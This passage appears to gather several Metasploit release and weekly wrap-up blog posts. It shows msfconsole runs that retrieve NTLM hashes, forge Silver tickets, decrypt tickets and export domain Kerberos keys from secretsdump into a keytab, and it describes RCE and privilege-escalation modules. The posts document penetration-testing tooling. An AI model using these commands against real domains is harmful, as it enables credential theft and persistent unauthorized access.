[+] - Received a valid TGT-Response
[*] - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230126155217_default_192.168.159.10_mit.kerberos.cca_813470.bin
[*] - Getting NTLM hash for smcintyre@msflab.local
[+] - Received a valid TGS-Response
[*] - TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20230126155217_default_192.168.159.10_mit.kerberos.cca_485504.bin
[+] Found NTLM hash for smcintyre: aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f
[*] Auxiliary module execution completed
msf6 auxiliary(admin/kerberos/get_ticket) >

Forging tickets

After compromising a KDC or service account, users can forge Kerberos tickets for persistence. The auxiliary/admin/kerberos/forge_ticket module can forge Golden Tickets with the KRBTGT account hash, or Silver Tickets with service hashes:

msf6 auxiliary(admin/kerberos/forge_ticket) > run action=FORGE_SILVER domain=demo.local domain_sid=S-1-5-21-1266190811-2419310613-1856291569 nthash=fbd103200439e14d4c8adad675d5f244 user=Administrator spn=cifs/dc3.demo.local

[+] MIT Credential Cache ticket saved on /Users/user/.msf4/loot/20220831223726_default_192.168.123.13_kerberos_ticket._550522.bin
[*] Auxiliary module execution completed

Kerberos debugging support

Metasploit 6.3 also introduces new tools that will make it easier for module developers and researchers to target Kerberos environments.

The new auxiliary/admin/kerberos/inspect_ticket module can show the contents of a Kerberos ticket, including decryption support if the key is known after running the auxiliary/gather/windows_secrets_dump module or similar:

msf6 > use auxiliary/admin/kerberos/inspect_ticket
msf6 auxiliary(admin/kerberos/inspect_ticket) > run AES_KEY=4b912be0366a6f37f4a7d571bee18b1173d93195ef76f8d1e3e81ef6172ab326 TICKET_PATH=/path/to/ticket
Primary Principal: Administrator@WINDOMAIN.LOCAL
Ccache version: 4

Creds: 1
    Server: cifs/dc.windomain.local@WINDOMAIN.LOCAL
    Client: Administrator@WINDOMAIN.LOCAL
    Ticket etype: 18 (AES256)
    Key: 3436643936633032656264663030393931323461366635653364393932613763
    Ticket Length: 978
    Subkey: false
    Addresses: 0
    Authdatas: 0
      Auth time: 2022-11-21 13:52:00 +0000
      Start time: 2022-11-21 13:52:00 +0000
      End time: 2032-11-18 13:52:00 +0000
      Renew Till: 2032-11-18 13:52:00 +0000
      Ticket Version Number: 5
      Server Name: cifs/dc.windomain.local
      Encrypted Ticket Part:
        Ticket etype: 18 (AES256)
        Key Version Number: 2
        Decrypted (with key: 4b912be0366a6f37f4a7d571bee18b1173d93195ef76f8d1e3e81ef6172ab326):
            Auth time: 2022-11-21 13:52:00 UTC
            Start time: 2022-11-21 13:52:00 UTC
            End time: 2032-11-18 13:52:00 UTC
            Renew Till: 2032-11-18 13:52:00 UTC
          Client Addresses: 0
          Transited: tr_type: 0, Contents: ""
          Client Name: 'Administrator'
          Client Realm: 'WINDOMAIN.LOCAL'
          Ticket etype: 18 (AES256)
          Encryption Key: 3436643936633032656264663030393931323461366635653364393932613763
            Validation Info:
              Logon Time: 2022-11-21 13:52:00 +0000
              Logoff Time: Never Expires (inf)
              Kick Off Time: Never Expires (inf)
              Password Last Set: No Time Set (0)
              Password Can Change: No Time Set (0)
              Password Must Change: Never Expires (inf)
              Logon Count: 0
              Bad Password Count: 0
              User ID: 500
              Primary Group ID: 513
              User Flags: 0
              User Session Key: 00000000000000000000000000000000
              User Account Control: 528
              Sub Auth Status: 0
              Last Successful Interactive Logon: No Time Set (0)
              Last Failed Interactive Logon: No Time Set (0)
              Failed Interactive Logon Count: 0
              SID Count: 0
              Resource Group Count: 0
              Group Count: 5
              Group IDs:
                Relative ID: 513, Attributes: 7
                Relative ID: 512, Attributes: 7
                Relative ID: 520, Attributes: 7
                Relative ID: 518, Attributes: 7
                Relative ID: 519, Attributes: 7
              Logon Domain ID: S-1-5-21-3541430928-2051711210-1391384369
              Effective Name: 'Administrator'
              Full Name: ''
              Logon Script: ''
              Profile Path: ''
              Home Directory: ''
              Home Directory Drive: ''
              Logon Server: ''
              Logon Domain Name: 'WINDOMAIN.LOCAL'
            Client Info:
              Name: 'Administrator'
              Client ID: 2022-11-21 13:52:00 +0000
            Pac Server Checksum:
              Signature: 04e5ab061c7a909a26b122c2
            Pac Privilege Server Checksum:
              Signature: 710bb183858257f41021bd7e

Metasploit has also added first-class support for the Keytab file format for storing the encryption keys of principals. This can be used in Wireshark to automatically decrypt KRB5 network traffic.

For instance, if Metasploit’s database is configured when running the secretsdump module against a domain controller, the extracted Kerberos keys will be persisted in Metasploit’s database:

# Secrets dump
msf6 > use auxiliary/gather/windows_secrets_dump
msf6 auxiliary(gather/windows_secrets_dump) > run smbuser=Administrator smbpass=p4$$w0rd rhosts=
... ommitted ...
# Kerberos keys:
... ommitted ...
[*] Auxiliary module execution completed

These Kerberos encryption keys can then be exported to a new Keytab file with the admin/kerberos/keytab module:

# Export to keytab
msf6 auxiliary(gather/windows_secrets_dump) > use admin/kerberos/keytab
msf6 auxiliary(admin/kerberos/keytab) > run action=EXPORT keytab_file=./example.keytab
[+] keytab saved to ./example.keytab
Keytab entries

 kvno  type              principal                                   hash                                                              date
 ----  ----              ---------                                   ----                                                              ----
 1     1  (DES_CBC_CRC)  WIN11-DC3$@adf3.local                       3e5d83fe4594f261                                                  1970-01-01 01:00:00 +0100
 1     17 (AES128)       ADF3\DC3$@adf3.local                        967ccd1ffb9bff7900464b6ea383ee5b                                  1970-01-01 01:00:00 +0100
 1     3  (DES_CBC_MD5)  ADF3\DC3$@adf3.local                        62336164643537303830373630643133                                  1970-01-01 01:00:00 +0100
 1     18 (AES256)       Administrator@adf3.local                    56c3bf6629871a4e4b8ec894f37489e823bbaecc2a0a4a5749731afa9d158e01  1970-01-01 01:00:00 +0100
 1     17 (AES128)       Administrator@adf3.local                    df990c21c4e8ea502efbbca3aae435ea                                  1970-01-01 01:00:00 +0100
 1     3  (DES_CBC_MD5)  Administrator@adf3.local                    ad49d9d92f5da170                                                  1970-01-01 01:00:00 +0100
 1     1  (DES_CBC_CRC)  Administrator@adf3.local                    ad49d9d92f5da170                                                  1970-01-01 01:00:00 +0100
 1     18 (AES256)       krbtgt@adf3.local                           e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c  1970-01-01 01:00:00 +0100
 1     17 (AES128)       krbtgt@adf3.local                           ba87b2bc064673da39f40d37f9daa9da                                  1970-01-01 01:00:00 +0100
 1     3  (DES_CBC_MD5)  krbtgt@adf3.local                           3ddf2f627c4cbcdc                                                  1970-01-01 01:00:00 +0100
... ommitted ...
[*] Auxiliary module execution completed

Once the new Keytab file is created, modify Wireshark to use the exported encryption keys in Edit -> Preferences -> Protocols -> KRB5, and select try to decrypt Kerberos blobs. Now Wireshark will automatically try to decrypt Kerberos blobs — the blue highlighted lines show Wireshark’s decryption working:

Metasploit Framework 6.3 Released

Certifried privilege escalation

Metasploit 6.3 adds an auxiliary module that exploits a privilege escalation vulnerability known as Certifried (CVE-2022–26923) in AD CS. The module will generate a valid certificate impersonating the Domain Controller (DC) computer account, and this certificate is then used to authenticate to the target as the DC account using PKINIT pre-authentication mechanism. The module will get and cache the TGT for this account along with its NTLM hash. Finally, it requests a TGS impersonating a privileged user (Administrator by default). This TGS can then be used by other modules or external tools.

Updated show options support

Previous to Metasploit 6.3 the show options and show advanced commands would display a module’s supported options in a single list.

Now module authors can add additional metadata to specify conditions for when options are relevant to the user, such as a particular action or datastore value being set. Metasploit will then logically group these options together when presenting to them to the user:

Metasploit Framework 6.3 Released

Get it

Existing Metasploit Framework users can update to the latest release of Metasploit Framework via the msfupdate command.

New users can either download the latest release through our nightly installers, or if you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest release.

Thanks to both Rapid7 developers and Metasploit community members for all their hard work on delivering this latest set of Metasploit features, in particular: Alan Foster, Ashley Donaldson, Brendan Watters, Chris Granleese, Christophe de la Fuente, Dean Welch, Grant Willcox, Jack Heysel, Jacquie Harris, Jeffrey Martin, Matthew Mathur, Navya Harika Karaka, Shelby Pace, Simon Janusz, Spencer McIntyre, and Zach Goldman.

2022 Annual Metasploit Wrap-Up

It's been another gangbusters year for Metasploit, and the holidays are a time to give thanks to all the people that help make our load a little bit lighter. So, while this end-of-year wrap-up is a highlight reel of the headline features and extensions that landed in Metasploit-land in 2022, we also want to express our gratitude and appreciation for our stellar community of contributors, maintainers, and users. The Metasploit team merged 824 pull requests across Metasploit-related projects in 2022, more than 650 of which were incorporated into the main metasploit-framework repository. If you fixed a typo, linked a new reference, or cleaned up some code spaghetti, thank you!

Active Directory Certificate Services attacks

For years now, penetration testers and attackers have emphasized Active Directory as a particularly juicy and valuable attack surface area. In 2021, we saw fresh attack research that outlined new techniques for targeting Active Directory Certificate Services, or AD CS, including multiple configuration flaws that can be leveraged to escalate permissions from a domain user to a privileged account. In response to requests from our user community, Metasploit released two modules in the second half of 2022 that support AD CS attack techniques:

  • auxiliary/gather/ldap_esc_vulnerable_cert_finder can be used by an authenticated AD user to enumerate Certificate Authorities (CAs) and find vulnerable certificate templates.
  • auxiliary/admin/dcerpc/icpr_cert allows users to issue certificates from AD CS with a few options that are used for exploiting some escalation (ESC) scenarios. Currently only escalation technique 1 (ESC1) can be exploited with the available options, but support for more techniques is planned.

Linux credential extraction with Mimipenguin

Metasploit expanded our post-exploitation capabilities for extracting plaintext credentials on Linux systems by porting the Mimipenguin utility to Metasploit. This allows users to extract credentials for a variety of services from an established Meterpreter session, including the gnome-keyring-daemon, vsftpd and sshd. Under the hood, this functionality uses a new Meterpreter API that allows searching through process memory.

Metasploit plays well with others

This year Metasploit added a few different ways of supporting interoperability with other offensive security tools. First up is the BOF Loader for COFF files, which enables usage of Cobalt Strike’s Beacon Object File format from within the Windows Meterpreter. This extension can also use BOF files written for Sliver. We’ve also made an improvement this year to allow users to bring their own payloads and stages from other tools and formats. If you’re a Sliver user, you can now deploy a Sliver agent as a custom payload stage, and we will use our own Metasploit stagers to upload and run the custom shellcode on the target.

Holiday hacking challenge

Metasploit teamed up with TryHackMe to deliver a challenge as part of their Advent of Cyber event, which ran for the month of December. The Metasploit challenge debuted on December 9 and walked users through a fun Christmas-themed story where they were able to use some of Metasploit’s latest pivoting capabilities. A walk-through is available under Task 9 on the official event page.

Sixth getsystem technique

Metasploit added a new technique to everyone’s favorite Meterpreter command in the middle of 2022 with help from cdelafuente-r7, who incorporated the newest named-pipe impersonation-based technique (the EfsPotato variant). This particular vulnerability affects Windows Vista / Server 2008 and later can be executed entirely in memory to escalate the current session to NT AUTHORITY\SYSTEM without spawning a new process. For more information about this and other getsystem techniques, check out the new module documentation. (Pro tip: Specific techniques can be used by number!)

Post API improvements and maintenance

Community member bcoles made more than 100 pull requests to improve and maintain the post-exploitation API used by Metasploit’s 400+ post modules. This enormous effort is greatly appreciated and has fixed numerous bugs, added new functionality, and made general improvements that benefit both end users and module developers alike. Among those improvements are removing quite a few lingering Meterpreter scripts (which were replaced by post modules in 2011) and adding shell session support for a few enumeration modules. The shell session support is particularly useful when combined with 2021’s payload-less session improvements because it bypasses the need to address evasion with Meterpreter.

New contributors

We would like to thank the community for all the work done this year. Particularly, we want to give a big shout out to the 45 new contributors that added great content to Metasploit. Some of these folks even added modules for celebrity vulnerabilities or flaws that were being actively exploited in the wild, such as Apache Spark RCE (CVE-2022-33891), Spring Cloud Gateway RCE (CVE-2022-22947) or Spring Framework RCE (CVE-2022-22965). We’re grateful to all our contributors for submitting modules that help organizations test their defenses, demonstrate risk, and prioritize mitigations.

New contributor # of modules
h00die-gr3y 5
krastanoel 4
npm-cesium137-io 4
Ayantaker 1
PazFi 1
c0rs 1
giacomo270197 1
jerrelgordon 1
m4lwhere 1
mauricelambert 1
rad10 1
talhakarakumru 1
usiegl00 1
vleminator 1

Others contributed to make Metasploit even better with enhancements, fixes and documentation:

New contributors

New module highlights

  • exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684 – This exploit contributed by community member heyder facilitated unauthenticated code execution on multiple Fortinet products including FortiOS, FortiProxy and FortiSwitchManager.
  • exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144 – Despite having a 2021 CVE, this particular vulnerability, contributed by community member h00die-gr3y, gained attention in 2022 for being an unauthenticated RCE in VMware’s NSX product. Being a deserialization vulnerability, exploitation is smooth and reliable.
  • auxiliary/gather/ldap_query – This new module allows users to gather useful information from an Active Directory Domain Services (AD DS) LDAP server. Metasploit currently includes 28 predefined queries for common actions like enumerating LAPS passwords, computer accounts, and users with configured Service Principal Names (SPNs) for Kerberoasting. Metasploit users can even define their own queries for use with the module.
  • exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc - This module, from community contributor h00die, added in support for CVE-2021-22015. vCenter is frequently targeted by attackers, so h00die’s contribution goes a long way in helping pen testers better assess the security of vCenter servers during their engagements.
  • exploit/linux/http/cisco_asax_sfr_rce - This module was added by jbaines-r7 and incorporated an exploit for CVE-2022-20828 that allows authenticated attackers to gain root-level shells on vulnerable Cisco ASA-X devices with FirePOWER Services enabled. These devices are frequently positioned in sensitive pivots within networks, and are prime targets for attackers, so gaining RCE on these devices often results in access to privileged networks and/or data.
  • exploit/multi/veritas/beagent_sha_auth_rce - This module from community contributor c0rs exploits CVE-2021-27876, CVE-2021-27877 and CVE-2021-27878 in Veritas Backup Exec Agent to bypass authentication and gain remote code execution as SYSTEM/root. This is quite a nice vulnerability since backup agents typically have access to sensitive information, so any compromise of such devices typically leads to access to sensitive company data. Combine this with SYSTEM/root privileges as an unauthenticated remote user, and you have a decent vulnerability for gaining initial access into a network and gaining information to start your pivoting attempts to other segments of that network.

Version 6.2 released

Over the summer, the Metasploit team announced the release of Metasploit Framework 6.2, which included a number of new features. Some of the highlights:

  • A streamlined authentication capturing plugin
  • An SMB 2 and 3-capable file server
  • Improved options for handling NATed services
  • Improved SMB relaying

We’re planning a 6.3 feature release in early 2023, so stay tuned for the next round of new Metasploit capabilities and improvements!

E-Z-2-contribute documentation

As of the 6.2 release, Metasploit has a new, user-contributable docs site at Want to contribute to Metasploit, but don't want to monkey around with Ruby or exploit code? We can always use more and better documentation on your favorite Metasploit features, workflows, and improvements. Get in there and help us teach people how hacking works!

From all of us at Rapid7, we wish you a very happy new year. As always, you can get the latest Metasploit updates every Friday in our weekly wrap-up, and you can stay up-to-date on vulnerability intelligence with AttackerKB.

Login brute-force utility

Metasploit Wrap-Up

Jan Rude added a new module that gives users the ability to brute-force login for Linux Syncovery. This expands Framework's capability to scan logins to Syncovery, a popular web GUI for backups.

WordPress extension SQL injection module

Cydave, destr4ct, and jheysel-r7 contributed a new module that takes advantage of a vulnerable WordPress extension. This allows Framework users to take advantage of CVE-2022-0739, leveraging a UNION-based SQL injection to gather hashed passwords of WordPress users. For vulnerable versions, anyone who can access the BookingPress plugin page will also have access to all the credentials in the database, yikes! There are currently 3,000 active installs of the plugin, which isn't a huge number by WordPress standards—but the ease of remote exploitation makes it a fun addition to the framework.

New module content (3)

Enhancements and features (2)

  • #17214 from h00die - This PR improves upon the data gathered on a vCenter server originally implemented in #16871, including library integration, optimization, and de-duplication.
  • #17332 from bcoles - Updates windows/gather/enum_proxy to support non-Meterpreter sessions (shell, PowerShell).

Bugs fixed (5)

  • #17183 from rbowes-r7 - This adds some small changes, cleanups, and fixes to the linux/http/zimbra_unrar_cve_2022_30333 and linux/http/zimbra_cpio_cve_2022_41352 Zimbra exploit modules, along with linux/local/zimbra_slapper_priv_esc documentation. Particularly, this fixes an issue that prevented the exploit modules from working properly when the handler was prematurely shut down.
  • #17305 from cgranleese-r7 - Updates Metasploit's RPC to automatically choose an appropriate payload if module.execute is invoked without a payload set. This mimics the functionality of msfconsole.
  • #17323 from h00die - Fixes a bug when attempting to detect enlightenment_sys in exploits/linux/local/ubuntu_enlightenment_mount_priv_esc.
  • #17330 from zeroSteiner - This fixes an issue in the ProxyShell module, which limited the email enumeration to 100 entries. Now, it correctly enumerates all the emails before finding one that is suitable for exploitation.
  • #17342 from gwillcox-r7 - This adds the necessary control to the search queries used to find vulnerable certificate templates in an AD CS environment. Prior to this, non-privileged users would not be able to read the security descriptor field.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.

To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Spring Cloud Gateway RCE

Metasploit Wrap-Up

This week, a new module that exploits a code injection vulnerability in Spring Cloud Gateway (CVE-2022-22947) has been added by @Ayantaker. Versions 3.1.0 and 3.0.0 to 3.0.6 are vulnerable if the Gateway Actuator endpoint is enabled, exposed and unsecured. The module sends a specially crafted SpEL expression to this endpoint and gets command execution as the user running Spring Cloud Gateway. A first request is sent to create a route with a filter including the SpEL expression which will be parsed with a StandardEvaluationContext. A second request is sent to reload the route and trigger code execution.

pfSense pfBlockNG plugin unauthenticated RCE

Our very own @jheysel-r7 added a module that exploits an OS command injection vulnerability in pfSense's pfBlockerNG plugin versions 2.1.4_26 and below and identified as CVE-2022-31814. The module sends an HTTP request with a payload in the Host: header, which will be executed by the PHP's exec() function. This leads to unauthenticated remote command execution as root. Note that this pfSense module is not installed by default but is commonly used to block inbound connections from countries or IP ranges.

New module content (2)

  • Spring Cloud Gateway Remote Code Execution by Ayan Saha, which exploits CVE-2022-22947 - A new module has been added in for CVE-2022-22947, an unauthenticated RCE in Spring Cloud Gateway versions 3.1.0 and 3.0.0 to 3.0.6 when the Gateway Actuator endpoint is enabled, exposed and unsecured. Successful exploitation results in arbitrary code execution as the user running Spring Cloud Gateway.
  • pfSense plugin pfBlockerNG unauthenticated RCE as root by IHTeam and jheysel-r7, which exploits CVE-2022-31814 - A module has been added for CVE-2022-31814, an unauthenticated RCE in the pfSense plugin within pfBlockerNG that allows remote unauthenticated attackers to execute execute arbitrary OS commands as root via shell metacharacters in the HTTP Host header. Versions <= 2.1.4_26 are vulnerable. Note that version 3.X is unaffected.

Enhancements and features (2)

  • #17123 from h00die - The netrc and fetchmail modules have been updated to include documentation on how to use the modules.
  • #17092 from bcoles - This PR updates the netlm_downgrade module, providing documentation, extending it to support more session types, and fixing some bugs that were present which caused false-positive warnings to appear.

Bugs fixed (3)

  • #16987 from jmartin-r7 - Improves scanner/smb/smb_login to gracefully handle additional error conditions when connecting to target services.
  • #17075 from cdelafuente-r7 - The Windows secrets dump module was failing early for non-administrative users. This fixes the issue so the module now throws warnings where it was previously failing early. Now the module can complete the DOMAIN action whereas before it was failing prior to reaching this point.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).